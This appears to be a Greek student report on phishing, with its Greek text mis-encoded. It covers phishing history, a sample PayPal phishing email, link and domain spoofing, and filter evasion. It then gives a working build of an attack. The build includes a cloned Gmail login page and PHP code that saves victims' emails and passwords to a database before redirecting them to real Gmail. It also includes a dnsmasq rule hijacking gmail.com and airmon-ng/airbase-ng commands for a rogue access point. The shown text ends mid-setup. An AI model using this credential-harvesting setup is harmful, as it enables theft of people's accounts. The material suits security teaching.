  • 3. 2 Πεξίιεςε….…………………………………………………………………………...1 Πεξηερόκελα…………………………………………………………………………...2 1. Δηζαγσγή…..……………………………………………………..…………………3 2. Ιζηνξηθή Αλαδξνκή…………………………………………………………………4 2.1 Απαξρέο…………………………………………………..……………......4 2.2 Πξόζθαηεο επηζέζεηο phishing…...……………………………………......4 2.3 Παξάδεηγκα Phising Mail………………………………………………….5 3. Σερληθέο Phising…………………………………………………………………….7 3.1 Παξαπνίεζε ΢πλδέζκσλ.………………………………………………….7 3.2 Απνθπγή Φίιηξσλ…………………………………………………………8 3.3 Παξαπνίεζε Ιζηνζειίδσλ…………………………………………………8 3.4 Phone Phising…..………………………………………………………….9 4. Πξνβιήκαηα πνπ δεκηνπξγεί ην Phising…………………………………………10 5. Τινπνίεζε….…………………………………………………………………….11 5.1 Πξνεηνηκαζία Τπνινγηζηή………………………………………………11 5.1.1 Γεκηνπξγία πιαζηήο ηζηνζειίδαο Gmail...……………………11 5.1.2 Ρπζκίζεηο Routing θαη Forwarding…………………………….13 5.2 Γεκηνπξγία πιαζηνύ Access Point………………………………………15 5.3 ΢ελάξηα Υξήζεο…………………………………………………………18 6. Σξόπνη Πξνζηαζίαο……………………………………………………………….18 7. Παξάξηεκα ……………………………………………………………………….19 Βηβιηνγξαθία…………………………………………………………………………27
  • 4. 3 1. Δηζαγσγή ΢ηνλ ηνκέα ηεο ειεθηξνληθήο αζθάιεηαο είλαη δηαδεδνκέλν ην πξόβιεκα ππνθινπήο νλνκάησλ ρξεζηώλ, θσδηθώλ πξόζβαζεο (usernames, passwords), ζηνηρείσλ πηζησηηθώλ θαξηώλ θαη άιισλ επαίζζεησλ πιεξνθνξηώλ. Όηαλ απηή γίλεηαη κέζσ πξνζπνίεζεο κηαο αμηόπηζηεο νληόηεηαο ζε θάπνηα ειεθηξνληθή επηθνηλσλία, νλνκάδεηαη phising. Η νληόηεηα πνπ ζπλήζσο ππνδύεηαη ν επηηηζέκελνο είλαη είηε θάπνηα γλσζηή ηζηνζειίδα παξνρήο ππεξεζηώλ (email, θνηλσληθή δηθηύσζε) είηε ε ηζηνζειίδα θάπνηαο ηξάπεδαο ή άιιεο ππεξεζίαο δηαρείξηζεο ειεθηξνληθώλ ρξεκαηηθώλ ζπλαιιαγώλ. Σν phishing δηεμάγεηαη ζπλήζσο κέζσ e-mail ή instant messaging, θαη ηα κελύκαηα πξνηξέπνπλ ηνπο ρξήζηεο λα εηζάγνπλ πιεξνθνξίεο ζε κηα ςεύηηθε ηζηνζειίδα, ε νπνία σζηόζν δείρλεη όκνηα κε ηελ απζεληηθή. Πξόθεηηαη γηα έλα παξάδεηγκα ρξήζεο ηερληθώλ social engineering πνπ εθκεηαιιεύεηαη ηε κε επαξθή ρξήζε ηερλνινγηώλ αζθαιείαο ζην δηαδίθηπν.
  • 5. 4 2. Ιζηνξηθή Αλαδξνκή 2.1 Απαξρέο Η πξώηε θαηαγεγξακκέλε ρξήζε ηνπ όξνπ "phishing" έγηλε ην 1996 αλ θαη ππήξμε κηα ιεπηνκεξήο πεξηγξαθή ηεο ηερληθήο από ην 1987, ζην δηεζλέο Users Group ηεο εηαηξείαο Hewlett Packard. Οη πξώηεο επηζέζεηο κε ζεκαληηθό αληίθηππν έγηλαλ ζην δίθηπν ηεο AOL (America Online), κέζσ κελπκάησλ ζηνλ ηόηε δεκνθηιή AIM (AOL Instant Messenger), ηα νπνία πξνέηξεπαλ ηνπο ρξήζηεο λα επηθπξώζνπλ ηα ζηνηρεία ηνπο, δεηώληαο κεηαμύ άιισλ θαη ηνλ θσδηθό πξόζβαζεο ηνπο. Η ίδηα ηαθηηθή ρξεζηκνπνηείηαη απξόζθνπηα κέρξη ζήκεξα ζε emails πνπ ππνηίζεηαη όηη πξνέξρνληαη από ηξάπεδεο. Δπηθαινύληαη ππνηηζέκελν πξόβιεκα κε ηνλ ινγαξηαζκό ηνπ πειάηε – ζηόρνπ, δεηώληαο αξηζκνύο πηζησηηθώλ θαξηώλ, θαζώο θαη ηα PIN θαη ηνπο αξηζκνύο αζθαιείαο CVV2/CVC2 πνπ ηνπο αληηζηνηρνύλ γηα λα επηβεβαηώζνπλ ηα ζηνηρεία πνπ έρνπλ. Σα emails απηά ρξεζηκνπνηνύλ ινγόηππα ηεο ηξάπεδαο αιιά θαη links πνπ νδεγνύλ ζην πξαγκαηηθό site, κε ζθνπό ηελ πεξαηηέξσ παξαπιάλεζε ηνπ ρξήζηε, ελώ ην πην πεηζηηθό κέζν είλαη ε ρξήζε δηεπζύλζεσλ ειεθηξνληθνύ ηαρπδξνκείνπ πνπ δείρλνπλ απζεληηθά θαζώο πεξηέρνπλ ζπλήζσο ην όλνκα ηεο ππεξεζίαο πνπ ππνηίζεηαη όηη ηα ζηέιλεη . Οη ηξάπεδεο πξνζπαζνύλ λα αληηκεησπίζνπλ ην πξόβιεκα κε ελεκεξσηηθά κελύκαηα ζηηο ειεθηξνληθέο ηνπο ζειίδεο, όπνπ επηζεκαίλνπλ όηη πνηέ δε δεηείηαη PIN ή άιινο πξνζσπηθόο θσδηθόο από ππάιιειν ηεο ηξάπεδαο, κε νπνηνδήπνηε ηξόπν.
  • 6. 5 2.2 Πξόζθαηα θαηαγεγξακκέλεο επηζέζεηο phishing Κύξηνο ζηόρνο ησλ επηζέζεσλ, παξακέλνπλ νη πειάηεο ηξαπεδώλ θαη άιισλ ππεξεζηώλ ειεθηξνληθώλ πιεξσκώλ όπσο ην PayPal. Χζηόζν ε ηαρεία εμάπισζε ησλ ηζηνζειίδσλ θνηλσληθήο δηθηύσζεο πξνζθέξνπλ λένπο, πνιιά ππνζρόκελνπο ζηόρνπο γηα επηζέζεηο phishing, θαζώο ηα πξνζσπηθά δεδνκέλα κπνξνύλ λα ρξεζηκνπνηεζνύλ γηα ππεμαηξέζεηο ηαπηόηεηαο εηο βάξνο αλππνςίαζησλ ρξεζηώλ. Η έιιεηςε εμνηθείσζεο ησλ λέσλ ρξεζηώλ κε ην δηαδίθηπν ηνπο θαζηζηά επθνιόηεξνπο ζηόρνπο ζε ηέηνηνπ είδνπο επηζέζεηο. Πεηξάκαηα έρνπλ δείμεη όηη νη επηζέζεηο phising έρνπλ έλα πνζνζηό επηηπρίαο ηεο ηάμεσο ηνπ 70%. Γεδνκέλνπ όηη πνιύ ζπρλά, αθόκε θαη έκπεηξνη ρξήζηεο ρξεζηκνπνηνύλ ηνλ ίδην θσδηθό αλαγλώξηζεο γηα πεξηζζόηεξεο από κηα ππεξεζίεο, καο δίλεη κηα ζεκαληηθή έλδεημε γηα ην κέγεζνο ηεο δεκηάο πνπ κπνξεί λα πξνθιεζεί ζηελ ειεθηξνληθή παξνπζία ελόο αηόκνπ από κηα θαη κόλν επηηπρεκέλε επίζεζε phising. Σν 2006, έλα worm θαηέιαβε ηζηνζειίδεο ρξεζηώλ ηνπ MySpace θαη άιιαμε δηάθνξα links ώζηε λα ζηέιλνπλ ηνπο επηζθέπηεο ζε ηζηνζειίδεο ζρεδηαζκέλεο γηα λα ππνθιέπηνπλ ζηνηρεία login. Τπάξρνπλ ηζηνζειίδεο όπσο ε FraudWatch International θαη ε Millersmiles, πνπ έρνπλ σο ζθνπό ηελ θαηαπνιέκεζε ηνπ phishing. Οη ηζηνζειίδεο δεκνζηεύνπλ ηα πην πξόζθαηα πιαζηά κελύκαηα κε ηα νπνία νη phisers πξνζπαζνύλ λα παγηδεύζνπλ ηνπο ρξήζηεο θαη πξνζθέξνπλ εκπνξηθή αληηκεηώπηζε ζηνρεπκέλνπ phising πνπ γίλεηαη εηο βάξνο εηαηξεηώλ. 2.3 Παξάδεηγκα Phising Mail Αθνινπζεί έλα phising mail ην νπνίν έρεη ζρεδηαζηεί γηα ππεμαίξεζε ζηνηρείσλ ζύλδεζεο ζην PayPal. Σν mail από ην νπνίν εζηάιε είλαη ην service@security-paypal.com
  • 7. 6 Φπζηθά ηα emails πνπ πξνέξρνληαη από ην PayPal έρνπλ σο host ην paypal.com. Χζηόζν έλαο κε έκπεηξνο ρξήζηεο ζα κπνξνύζε λα ππνζέζεη όηη πξόθεηηαη γηα ην ηκήκα “αζθάιεηαο” ηνπ PayPal, λα κπεη ζηελ ηζηνζειίδα κέζσ ηνπ link πνπ βξίζθεηαη ζην mail θαη λα νδεγεζεί ζηελ πξνθαλώο πιαζηή ηζηνζειίδα: http://tcr.logo-shop.net/paypal.com/
  • 8. 7 3. Σερληθέο Phising Σν πξνεγνύκελν παξάδεηγκα καο έδεημε έλαλ κόλν από ηνπο ηξόπνπο πνπ ρξεζηκνπνηνύληαη γηα ππνθινπή θσδηθώλ πξόζβαζεο. Αλ θαη έρεη ραξαθηεξηζηεί “κεζαίαο επηθηλδπλόηεηαο” από ην Millersmiles, απηό έρεη λα θάλεη κε ηε δηεύζπλζε απνζηνιήο. To site ζην νπνίν νδεγεί είλαη πξνθαλέζηαηα πιαζηό αιιά αλ ε δηεύζπλζε απηή έθαλε redirect ζε κηα ζειίδα κε url www.security-paypal.com, ε επηθηλδπλόηεηα απηνύ ηνπ scam mail ζα απμαλόηαλ θαηαθόξπθα. 3.1 Παξαπνίεζε ΢πλδέζκσλ Οη πεξηζζόηεξεο κέζνδνη ζηηο επηζέζεηο phishing, ρξεζηκνπνηνύλ θάπνηα ηερληθή παξαπιάλεζε όπσο ε αλσηέξσ, ζρεδηαζκέλε έηζη ώζηε λα εκθαλίδεηαη σο απζεληηθό έλα link ζε έλα email, θαζώο θαη ε ηζηνζειίδα ζηελ νπνία νδεγεί. ΢ύλδεζκνη κε αδηόξαηα ηππνγξαθηθά ιάζε είλαη πνιύ ζπλεζηζκέλνη. Οη δηεπζύλζεηο κνηάδνπλ νπηηθά κε ηηο πξαγκαηηθέο θαη εμαπαηνύλ ην ρξήζηε κε έλα πηζηό αληίγξαθν ηεο ηζηνζειίδαο πνπ πεξηκέλεη λα δεη. Έλα παξάδεηγκα γηα ππεμαίξεζε πιεξνθνξηώλ κε απηό ηνλ ηξόπν, ήηαλ ε ρξήζε ηνπ domain .corn. Έλαο ρξήζηεο πνπ βιέπεη θεπγαιέα ηε δηεύζπλζε http://www.trapeza.corn/ ζηνλ browser κπνξεί εύθνια λα λνκίζεη όηη είλαη ζηελ απζεληηθή ζειίδα http://www.trapeza.com/ θαη λα θαηαρσξήζεη ηα ζηνηρεία ηνπ.
  • 9. 8 Έλα άιιν πξόβιεκα κε ηα URLs παξνπζηάζηεθε κε ηε δηάζεζε domain names ζε γιώζζεο κε ραξαθηήξεο πέξαλ ησλ ιαηηληθώλ. Έηζη, έλαο ζύλδεζκνο όπσο ην “eurνbank.gr”, ζα κπνξνύζε λα νδεγεί ζε κηα πιαζηή ζειίδα, επεηδή ην “ν” ζην link είλαη ειιεληθό. Σν πξόβιεκα παξακέλεη αθόκε θαη αλ έλαο ρξήζηεο πξνζέρεη ηα ςεθηαθά πηζηνπνηεηηθά, κηαο θαη είλαη δπλαηόλ ν επηηηζέκελνο λα αγνξάζεη έλα πηζηνπνηεηηθό γηα ην site ηνπ θαη ζηε ζπλέρεηα λα κεηαβάιιεη ην πεξηερόκελό ηνπ, αληηγξάθνληαο ηε ζειίδα πνπ επηζπκεί λα ππνθιέςεη. Η ρξήζε subdomains είλαη αθόκε κηα ζπλεζηζκέλε κνξθή εμαπάηεζεο. Γηα παξάδεηγκα ε ηζηνζειίδα: http://www.trapeza.kartes.gr/, δείρλεη λα νδεγεί ζην ηκήκα θαξηώλ ηεο “Trapeza”. ΢ηελ πξαγκαηηθόηεηα ζα νδεγνύζε ζην ηκήκα "trapeza" ηνπ kartes.gr πνπ ζα κπνξνύζε λα πεξηέρεη κηα πιαζηή απεηθόληζε ηνπ απζεληηθνύ website. 3.2 Απνθπγή Φίιηξσλ Σα θίιηξα αλεπηζύκεηνπ ειεθηξνληθνύ ηαρπδξνκείνπ (spam), είλαη ξπζκηζκέλα ώζηε λα απνξξίπηνπλ phishing e-mails βάζεη ιέμεσλ-θιεηδηώλ πνπ πεξηέρνπλ. Χζηόζν νη phisers, αληηθαζηζηνύλ ην θείκελν κε εηθόλεο, παξαθάκπηνληαο ηα θίιηξα γηα phising. Γηα απηό ην ιόγν, νη παξνρείο ππεξεζηώλ ειεθηξνληθνύ ηαρπδξνκείνπ δελ θνξηώλνπλ ηηο εηθόλεο πνπ πεξηέρεη έλα email αλ ν ρξήζηεο δε δεισζεη όηη ν ρξήζηεο γλσξίδεη θαη εκπηζηεύεηαη ηνλ απνζηνιέα. ΢ε απηή ηελ πεξίπησζε όκσο, πξέπεη λα βαζηζηεί ζηε δηεύζπλζε email πνπ κπνξεί εύθνια λα παξνπζηαζηεί σο απζεληηθή. 3.3 Γεκηνπξγία Πιαζηώλ Ιζηνζειίδσλ Αλαθεξζήθακε ήδε ζε ηζηνζειίδεο πνπ έρνπλ ζρεδηαζηεί αληηγξάθνληαο ηηο ηζηνζειίδεο πνπ ππνδύνληαη. ΢ε πεξίπησζε πνπ o ππνθινπέαο δελ έρεη δεκηνπξγήζεη domain πνπ λα κνηάδεη κε απηό ηεο απζεληηθήο ζειίδαο, ρξεζηκνπνηεί εληνιέο JavaScript ώζηε λα παξαπνηήζεη ηε γξακκή δηεύζπλζεο. Απηό γίλεηαη είηε ηνπνζεηώληαο κηα εηθόλα πάλσ από ηε δηεύζπλζε, θαιύπηνληάο ηε, είηε θξύβνληαο
  • 10. 9 εληειώο ηε κπάξα δηεπζύλζεσλ κέζσ εληνιώλ HTML θαη αθήλνληαο κόλν ηελ εηθόλα ζηελ θνξπθή. Ο επηηηζέκελνο κπνξεί λα ρξεζηκνπνηήζεηο αθόκε θαη ειαηηώκαηα ηνπ ίδηνπ ηνπ script ηεο ζειίδαο, θάλνληαο αθόκε θαη ηα πηζηνπνηεηηθά αζθαιείαο λα εκθαλίδνληαη ζσζηά. ΢ηελ πξαγκαηηθόηεηα, ην link πνπ νδεγεί ζηε ζειίδα είλαη θηηαγκέλν έηζη ώζηε λα δηεμάγεη ηελ επίζεζε. Έλα ηέηνην ειάηησκα ρξεζηκνπνηήζεθε ην 2006 ελάληηα ζην PayPal. Η RSA Security αλαθάιπςε όηη θπθινθνξεί έλα παθέην εξγαιείσλ γηα phising, πνπ κέζα από έλα απιό interface παξέρεη ζην ρξήζηε ηε δπλαηόηεηα λα αλαπαξάγεη πεηζηηθά websites θαη λα απνθηά πιεξνθνξίεο πξόζβαζεο κέζσ κηαο man-in-the-middle ηερληθήο. ΢εκαληηθή βνήζεηα ζηνπο phisers έρεη πξνζθέξεη θαη ην flash, αθνύ θξύβνληαο ηα κελύκαηα πνπ πξνηξέπνπλ ηνλ αλππνςίαζην ρξήζηε λα δειώζεη ηα ζηνηρεία ηνπ κέζα ζε multimedia objects, απνθεύγνπλ ηηο κεραλέο αλαδήηεζεο θαθόβνπισλ ηζηνζειίδσλ πνπ ςάρλνπλ γηα θείκελα κε ζπγθεθξηκέλα ραξαθηεξηζηηθά θαη ιέμεηο θιεηδηά πνπ παξαπέκπνπλ ζε κελύκαηα εμαπάηεζεο θαη ηα νπνία ρξεζηκνπνηνύληαη από ζειίδεο γηα phising Μηα αθόκε ηερληθή πνπ ρξεζηκνπνηείηαη κε επηηπρία είλαη ε πξνώζεζε ελόο ρξήζηε ζηελ πξαγκαηηθή ηζηνζειίδα ηεο ηξάπεδάο ηνπ. Χζηόζν ην link έρεη δηακνξθσζεί έηζη ώζηε λα εκθαλίζεη θαη έλα παξάζπξν (popup window) δεηώληαο ηα ζηνηρεία ζύλδεζήο ηνπ κε ην e-banking ηεο ηξάπεδαο. Η κέζνδνο απηή είλαη ηδηαίηεξα επηθίλδπλε, θαζώο θάπνηεο ηξάπεδεο ρξεζηκνπνηνύλ θαη νη ίδηεο popup windows γηα ηε ζύλδεζε ηνπ πειάηε. 3.4 Phone Phising Οη πηζαλνί ζηόρνη γηα phishing δελ είλαη θαη' αλάγθε ηζηνζειίδεο. Έλαο επηηηζέκελνο κπνξεί λα ζηείιεη κελύκαηα πνπ ηζρπξίδνληαη όηη πξνέξρνληαη από κηα ηξάπεδα θαη λα δεηήζνπλ από ην ρξήζηε λα θαιέζεη έλα ηειεθσληθό αξηζκό γηα λα δηεπζεηεζεί ππνηίζεηαη έλα πξόβιεκα πνπ έρεη πξνθύςεη κε ηνλ ηξαπεδηθό ηνπο ινγαξηαζκό. Δθεί ηνπο ππνδέρεηαη έλα απηνκαηνπνηεκέλν κήλπκα ην νπνίν δεηά λα
  • 11. 10 πιεθηξνινγήζνπλ ζηε ζπζθεπή ηνλ αξηζκό ηνπ ηξαπεδηθνύ ηνπο ινγαξηαζκνύ, ηεο πηζησηηθήο ηνπο θάξηαο θαη ην PIN ηνπο. 4. Πξνβιήκαηα πνπ δεκηνπξγεί ην phising Οη επηζέζεηο ηύπνπ phishing δεκηνπξγνύλ πξνβιήκαηα πνπ πνηθίινπλ από άξλεζε πξόζβαζεο ζε ειεθηξνληθέο ππεξεζίεο κέρξη ζεκαληηθέο νηθνλνκηθέο απώιεηεο. Τπνινγίδεηαη όηη κεηαμύ ηνπ Μαΐνπ ηνπ 2004 θαη ηνπ Μαΐνπ ηνπ 2005, πεξίπνπ 1,2 εθαηνκκύξηα ρξήζηεο κόλν από ηηο Ηλσκέλεο Πνιηηείεο, έραζαλ ζπλνιηθά 929 εθαηνκκύξηα δνιάξηα. Σν 2007 νη επηζέζεηο θιηκαθώζεθαλ, εμαπαηώληαο 3,6 εθαηνκκύξηα ελήιηθεο λα ράζνπλ 3.2 δηζεθαηνκκύξηα δνιάξηα. ΢ην Ηλσκέλν Βαζίιεην, νη απώιεηεο από απάηεο ζην web banking ζρεδόλ δηπιαζηάζηεθαλ από 12,2 εθαηνκκύξηα ιίξεο ην 2004 ζε 23,2 εθαηνκκύξηα ην 2005, ελώ 1 ζηνπο 20 ρξήζηεο δειώλνπλ όηη έπεζαλ ζύκαηα phising. Μέζσ phising όκσο κπνξνύλ λα ραζνύλ θαη ινγαξηαζκνί γηα ηνπο νπνίνπο νη ρξήζηεο έρνπλ αθηεξώζεη ρξόλν αιιά ζε νξηζκέλεο πεξηπηώζεηο θαη ρξήκα. Σν θαηλόκελν παξαηεξείηαη ζε δηθηπαθά παηρλίδηα ξόισλ, όπνπ ηα εηθνληθά αληηθείκελα θαη ην εηθνληθό λόκηζκα ηνπ παηρληδηνύ αληαιιάζζεηαη ζε δεκνπξαζίεο κε πξαγκαηηθά ρξήκαηα. Η θινπή ηεο εηθνληθήο πεξηνπζίαο δε ρξεηάδεηαη παξά ειάρηζηα ιεπηά κεηά ηελ ππεμαίξεζε ησλ ζηνηρείσλ ζύλδεζεο. Γηα απηό ην ιόγν, ην Αλώηαην Γηθαζηήξην ηεο Ννηίνπ Κνξέαο, απνθάζηζε όηη ηα εηθνληθά αγαζά ζα έρνπλ ίδηα λνκηθή κεηαρείξηζε κε ηα πξαγκαηηθά αγαζά. Σα εηθνληθά αγαζά ππνινγίδνληαη σο κηα βηνκεραλία αμίαο 5 δηζεθαηνκκπξίσλ δνιαξίσλ παγθνζκίσο.
  • 12. 11 5. Τινπνίεζε Γηα λα ιεηηνπξγήζεη έλαο ππνινγηζηήο σο router δε ρξεηάδνληαη ηδηαίηεξεο απαηηήζεηο ζε ζέκαηα ηζρύνο, κλήκεο ή ρσξεηηθόηεηαο ζην ζθιεξό δίζθν. Χζηόζν, θξίλεηαη αλαγθαία ε ύπαξμε θαηάιιεινπ πιηθνύ όζνλ αθνξά ηελ αζύξκαηε δηθηύσζε, θαζώο δελ είλαη όιεο νη ζπζθεπέο ηθαλέο λα κπνπλ ζε monitor mode. Σν Linux Wireless wiki, πεξηέρεη κηα ελεκεξσκέλε ιίζηα, ζρεηηθά κε ηηο ζπζθεπέο πνπ κπνξνύκε λα ρξεζηκνπνηήζνπκε. 5.1 Πξνεηνηκαζία Τπνινγηζηή Υξεζηκνπνηνύκε έλα απιό netbook κε ηελ ηειεπηαία δηαλνκή Ubuntu, ηε 10.04. Ο ππνινγηζηήο είλαη ζπλδεδεκέλνο αζύξκαηα κε έλα δίθηπν. Θα ρξεζηκνπνηήζνπκε έλαλ USB αληάπηνξα αζύξκαηνπ δηθηύνπ, κνληέιν ASUS WL- 167g γηα λα δεκηνπξγήζνπκε έλα ςεύηηθν access point πνπ ζα ππνδύεηαη ην πξαγκαηηθό. Η ρξήζε netbook καο δίλεη ην πιενλέθηεκα ηεο απηνλνκίαο θαζώο έρνπκε κηα ζπζθεπή ρσξίο εμσηεξηθέο απαηηήζεηο ζε ελέξγεηα ε νπνία κπνξεί λα αλαδηαλείκεη κηα ήδε ππάξρνπζα αζύξκαηε ζύλδεζε ζην internet ή θαη κηα ζύλδεζε ζην internet κέζσ δηθηύνπ θηλεηήο ηειεθσλίαο. Δγθαζηζηνύκε ηα πξνγξάκκαηα airmon-ng, airbase-ng, dhcp3, dnsmasq θαη xampp for linux ζηνλ ππνινγηζηή, απαξαίηεηα γηα ηε δεκηνπξγία ηνπ access point, ην ζηήζηκν ηεο ςεύηηθεο ηζηνζειίδαο θαη ηελ απνζήθεπζε ησλ ζηνηρείσλ ηνπ ρξήζηε. 5.1.1 Γεκηνπξγία πιαζηήο ηζηνζειίδαο Gmail. ΢ε έλα terminal ηξέρνπκε ηελ εληνιή: sudo /opt/lampp/lampp start γηα λα μεθηλήζεη ην xampp for linux. Αλνίγνπκε έλαλ browser θαη πιεθηξνινγνύκε localhost ζηε κπάξα δηεπζύλζεσλ. Από ηελ αξρηθή ζειίδα ηνπ xampp κεηαβαίλνπκε ζην phpMyAdmin όπνπ θαη ζα δεκηνπξγήζνπκε ηε βάζε δεδνκέλσλ καο. Γεκηνπξγνύκε κηα απιή βάζε, (όλνκα βάζεο: gTake) κε έλα table (όλνκα πίλαθα creds) ην νπνίν έρεη δύν πεδία, ην
  • 13. 12 email θαη ην pass, ζηα νπνία ζα απνζεθεύνληαη ην email θαη ν θσδηθόο πξόζβαζεο ηνπ ρξήζηε αληίζηνηρα. Μεηαβαίλνπκε ζηελ ζειίδα εηζόδνπ ζην gmail θαη αληηγξάθνπκε ηνλ source code. Σνλ κεηαθέξνπκε ζε έλα θελό έγγξαθν ην νπνίν απνζεθεύνπκε ζαλ αξρείν php ζην θάθειν htdocs ζην path: /opt/lampp/. Δπεμεξγαδόκαζηε ην αξρείν θαη ζηε θόξκα ηνπ login, αιιάδνπκε ηε δηεύζπλζε ζηελ νπνία νδεγεί ην post action, ηελ εληνιή απνζηνιήο ησλ ζηνηρείσλ πνπ εηζήγαγε ν ρξήζηεο γηα απζεληηθνπνίεζε, ζε κηα ηνπηθή ζειίδα. Η insert.php δηακνξθώλεηαη έηζη ώζηε λα ζπλδέεηαη ζηε βάζε δεδνκέλσλ πνπ δεκηνπξγήζακε θαη λα θαηαρσξεί ην username θαη ην password ζηα αληίζηνηρα πεδία σο εμήο: <?php $con = mysql_connect("localhost","root",""); if (!$con) { die('Could not connect: ' . mysql_error()); } mysql_select_db("gTake", $con); mysql_query("INSERT INTO creds VALUES ('$_POST[Email]', '$_POST[Passwd]')"); mysql_close($con); header('Location: https://www.google.com/accounts/ServiceLoginAuth?service=mail'); ?> <form id="gaia_loginform" action="insert.php" method="post" onsubmit= "return(gaia_onLoginSubmit());" >
  • 14. 13 Αθνύ πεξάζεη ηα ζηνηρεία ζηε βάζε, ζηέιλεη ην ρξήζηε ζηε θαλνληθή ζειίδα ηνπ gmail γηα λα ζπλδεζεί. 5.1.2 Ρπζκίζεηο Routing θαη Forwarding ΢ηε ζπλέρεηα ξπζκίδνπκε ηνλ ππνινγηζηή ώζηε λα δίλεη δηεπζύλζεηο IP από έλα ζπγθεθξηκέλν εύξνο ζε όζεο ζπζθεπέο ζπλδεζνύλ κε απηόλ θαη λα πξνσζεί ζπγθεθξηκέλα requests ζηελ ζειίδα πνπ ζέινπκε. Γηα επθνιία ηξέρνπκε ηελ εληνιή sudo su πνπ καο δίλεη δηθαηώκαηα δηαρεηξηζηή ρσξίο λα ρξεηάδεηαη λα εηζάγνπκε ηνλ θσδηθό καο ζπλέρεηα. Να επηζεκάλνπκε όηη απαηηείηαη ηδηαίηεξε πξνζνρή θαζώο όηαλ έρνπκε root privileges ηίπνηε δε καο πεξηνξίδεη από ην λα θαηαζηξέςνπκε ην ζύζηεκα καο. Αξρηθά επεμεξγαδόκαζηε ην αξρείν dhcpd.conf ην νπνίν βξίζθεηαη ζην θάθειν ηνπ dhcp3, κε ηελ εληνιή: nano /etc/dhcp3/dhcpd.conf ΢ηε ζπλέρεηα αιιάδνπκε ην πεξηερόκελό ηνπ ζε: Απνζεθεύνπκε θαη θιείλνπκε ην αξρείν. ddns-update-style ad-hoc; default-lease-time 600; max-lease-time 7200; subnet 192.168.2.128 netmask 255.255.255.128 { option subnet-mask 255.255.255.128; option broadcast-address 192.168.2.255; option routers 192.168.2.129; option domain-name-servers 192.168.2.129; range 192.168.2.130 192.168.2.140; }
  • 15. 14 Η IP δηεύζπλζε 192.168.2.129 αληηζηνηρεί ζην router ηνπ δηθηύνπ πνπ ζα δεκηνπξγήζνπκε, δειαδή ζην netbook καο. Με απηέο ηηο ξπζκίζεηο, ν dhcp server αλαδεηά ηηο αληηζηνηρίζεηο ησλ domain names πξώηα ηνπηθά. Με ηε ρξήζε ηνπ dnsmasq κπνξνύκε λα πξνσζνύκε ζπγθεθξηκέλα domains ζηελ IP πνπ ζέινπκε. Ρπζκίδνπκε ινηπόλ ην dnsmasq λα πξνσζεί ηηο αηηήζεηο πξνο ην gmail.com ζην δηθό καο site. Αλνίγνπκε ην αξρείν ξπζκίζεσλ ηνπ dnsmasq ηξέρνληαο ηελ εληνιή: sudo nano /etc/dnsmasq.conf ΢ηε γξακκή 58, κεηά ην ζεκείν πνπ αλαθέξεη: Πξνζζέηνπκε ηε γξακκή: Βιέπνπκε θαη εδώ ηελ IP address ηνπ router καο. Απνζεθεύνπκε θαη θιείλνπκε ην αξρείν. Καλνληθά ε αξρηθή ζειίδα ηεο ηνπηθήο δηεύζπλζεο (localhost) καο νδεγεί ζηε ζειίδα δηαρείξηζεο ηνπ xampp. Γηα λα πξνσζείηαη ν ρξήζηεο ζηε ζειίδα πνπ δεκηνπξγήζακε, αιιάδνπκε ην αξρείν index.php πνπ βξίζθεηαη ζηε δηαδξνκή /opt/lampp/htdocs ώζηε λα έρεη απηή ηε κνξθή: address=/gmail.com/192.168.2.129 # Add domains which you want to force to an IP address here. # The example below send any host in doubleclick.net to a local # webserver. #address=/doubleclick.net/127.0.0.1
  • 16. 15 Δδώ είλαη ρξήζηκν λα θάλνπκε έλα restart ώζηε λα θιείζνπλ όια ηα services πνπ ηξέρνπλ θαη λα ηα εθθηλήζνπκε εθ λένπ αξγόηεξα. 5.2 Γεκηνπξγία πιαζηνύ Access Point Μεηά ηελ επαλεθθίλεζε είκαζηε έηνηκνη λα ζηήζνπκε ην access point ζην ρώξν πνπ καο ελδηαθέξεη. ΢ε έλα terminal ηξέρνληαο ηελ εληνιή iwconfig βιέπνπκε όηη ην interface ηνπ USB adapter είλαη ην wlan1 ελώ ηνπ ελζσκαησκέλνπ wifi adapter ην eth1. Θέηνπκε ην wlan1 ζε monitor mode κε ηηο εληνιέο: airmon-ng # καο δείρλεη ηηο ζπζθεπέο αζύξκαηνπ δηθηύνπ πνπ έρνπκε ζηνλ ππνινγηζηή καο, γηα λα επηιέμνπκε πνηα ζα ρξεζηκνπνηεζεί γηα monitoring airmon-ng start wlan1 # ζέηνπκε ζε monitor mode ην ASUS dongle, ην όλνκα ηνπ interface ην είρακε βξεί κε ηελ iwconfig, δεκηνπξγώληαο κηα εηθνληθή ζπζθεπή κε ην όλνκα mon0 <?php if (!empty($_SERVER['HTTPS']) && ('on' == $_SERVER['HTTPS'])) { $uri = 'https://'; } else { $uri = 'http://'; } $uri .= $_SERVER['HTTP_HOST']; # header('Location: '.$uri.'/xampp/'); header('Location: '.$uri.'/gmail.php'); exit; ?> Something is wrong with the XAMPP installation :-(
  • 17. 16 airbase-ng -e "Castle" -c 9 mon0 #όπνπ Castle βάδνπκε ην ssid ηνπ δηθηύνπ ζην νπνίν ζέινπκε λα παξεκβιεζνύκε Γεκηνπξγνύκε έηζη κηα δηεπηθάλεηα παξαθνινύζεζεο (TAP interface), κε όλνκα at0, ε νπνία εμνκνηώλεη κηα ζπζθεπή δηθηύνπ θαη ιεηηνπξγεί κε παθέηα layer 2. ΢ηε ζπλέρεηα μεθηλάκε ηε ιεηηνπξγία ηνπ πιαζηνύ Access Point καο. Σν SSID ηνπ είλαη Castle, ηξέρεη ζην θαλάιη 9 ρσξίο θξππηνγξάθεζε θαη ρξεζηκνπνηεί ηελ εηθνληθή ζπζθεπή mon0 πνπ δεκηνπξγήζακε λσξίηεξα. Αθήλνπκε απηό ην παξάζπξν ηνπ terminal αλνηρηό γηα λα ζπλερίζεη λα ιεηηνπξγεί ν ππνινγηζηήο καο σο router. Δδώ κπνξνύκε λα δνύκε θαη ηε MAC δηεύζπλζε όπνηαο ζπζθεπήο ζπλδεζεί. ΢ηε ζπλέρεηα, ζε έλα άιιν terminal, αθνύ απνθηήζνπκε πάιη δηθαηώκαηα δηαρεηξηζηή, ελεξγνπνηνύκε ην interface θαη ζέηνπκε ην subnet θαη ηελ gateway γηα ην at0 interface κε ηηο αθόινπζεο εληνιέο: ifconfig at0 up
